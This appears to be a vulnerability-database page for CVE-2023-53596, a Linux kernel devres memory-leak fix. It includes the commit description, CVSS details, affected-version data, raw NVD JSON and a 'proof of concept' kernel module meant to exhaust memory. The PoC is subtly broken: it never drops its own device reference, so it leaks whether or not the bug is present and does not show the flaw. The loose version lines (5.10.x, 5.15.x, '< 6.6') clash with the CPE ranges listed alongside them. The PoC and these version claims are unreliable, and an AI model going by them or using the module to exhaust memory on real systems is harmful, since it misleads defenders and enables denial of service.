Security Vulnerability Report
CVE-2023-53596 CVSS 7.8 HIGH

CVE-2023-53596

Published: 2025-10-04 16:15:56
Last Modified: 2026-03-21 00:54:30
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

drivers: base: Free devm resources when unregistering a device

In the current code, devres_release_all() only gets called if the device has a bus and has been probed.

This leads to issues when using bus-less or driver-less devices where the device might never get freed if a managed resource holds a reference to the device. This is happening in the DRM framework for example.

We should thus call devres_release_all() in the device_del() function to make sure that the device-managed actions are properly executed when the device is unregistered, even if it has neither a bus nor a driver.

This is effectively the same change as commit 2f8d16a996da ("devres: release resources on device_del()") that got reverted by commit a525a3ddeaca ("driver core: free devres in device_release") over memory leak concerns.

This patch effectively combines the two commits mentioned above to release the resources both on device_del() and device_release() and get the best of both worlds.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

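cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 3.7 inclusive, before 6.1.53) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2 inclusive, before 6.4.16) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.5 inclusive, before 6.5.3) - VULNERABLE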
Linux Kernel < 6.6 (all affected stable versions)
Linux Kernel 6.6.x (check the specific patch version)
Linux Kernel 6.1.x (LTS branch)
Linux Kernel 5.15.x (LTS branch)
Linux Kernel 5.10.x (LTS branch)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2023-53596 PoC - Linux Kernel devres Memory Leak
// This PoC demonstrates the memory leak caused by devres_release_all()
// not being called for bus-less or driver-less devices.
#include <linux/module.h>
#include <linux/device.h>
#include <linux/slab.h>

// Release callback, only reached on the error path below
static void devres_leak_release(struct device *dev)
{
    kfree(dev);
}

// Simulate a bus-less device creation that triggers the vulnerability
static int __init devres_leak_init(void)
{
    struct device *dev;
    void *leak_ptr;
    int i, ret;

    // Create a device without associating it with a bus or driver
    // This simulates the vulnerable code path
    dev = kzalloc(sizeof(struct device), GFP_KERNEL);
    if (!dev)
        return -ENOMEM;
    dev->release = devres_leak_release;
    device_initialize(dev);

    // Allocate managed resources using devm_* functions
    // These resources will never be released because:
    // 1. The device has no bus
    // 2. The device has no driver
    // 3. devres_release_all() is not called in device_del()
    for (i = 0; i < 1000; i++) {
        leak_ptr = devm_kzalloc(dev, 4096, GFP_KERNEL);
        if (!leak_ptr) {
            pr_err("Failed to allocate managed resource\n");
            break;
        }
        // Memory is intentionally not freed - simulating the leak
    }

    // Register and unregister the device
    // device_del() is only valid on a device that was added first
    ret = dev_set_name(dev, "devres_leak_poc");
    if (!ret)
        ret = device_add(dev);
    if (ret) {
        put_device(dev);
        return ret;
    }

    // In the vulnerable version, devres_release_all() is NOT called here
    // because the device has no bus and no driver
    device_del(dev);

    // The device and all managed resources leak here
    // In a real exploit, this loop would be repeated to exhaust memory
    return 0;
}

static void __exit devres_leak_exit(void)
{
    pr_info("Module unloaded\n");
}

module_init(devres_leak_init);
module_exit(devres_leak_exit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Security Researcher");
MODULE_DESCRIPTION("PoC for CVE-2023-53596 - Linux Kernel devres memory leak");

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53596", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.153", "lastModified": "2026-03-21T00:54:29.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrivers: base: Free devm resources when unregistering a device\n\nIn the current code, devres_release_all() only gets called if the device\nhas a bus and has been probed.\n\nThis leads to issues when using bus-less or driver-less devices where\nthe device might never get freed if a managed resource holds a reference\nto the device. This is happening in the DRM framework for example.\n\nWe should thus call devres_release_all() in the device_del() function to\nmake sure that the device-managed actions are properly executed when the\ndevice is unregistered, even if it has neither a bus nor a driver.\n\nThis is effectively the same change than commit 2f8d16a996da (\"devres:\nrelease resources on device_del()\") that got reverted by commit\na525a3ddeaca (\"driver core: free devres in device_release\") over\nmemory leaks concerns.\n\nThis patch effectively combines the two commits mentioned above to\nrelease the resources both on device_del() and device_release() and get\nthe best of both worlds."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", 
"negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.7", "versionEndExcluding": "6.1.53", "matchCriteriaId": "89E9E471-1046-448D-9B47-6061EBC5484E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.16", "matchCriteriaId": "C3039EA3-F6CA-43EF-9F17-81A7EC6841EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5", "versionEndExcluding": "6.5.3", "matchCriteriaId": "880C803A-BEAE-4DA0-8A59-AC023F7B4EE3"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/297992e5c63528e603666e36081836204fc36ec9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3bcc4c2a096e8342c8c719e595ce15de212694dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/699fb50d99039a50e7494de644f96c889279aca3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c8c426fae26086a0ca8ab6cc6da2de79810ec038", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}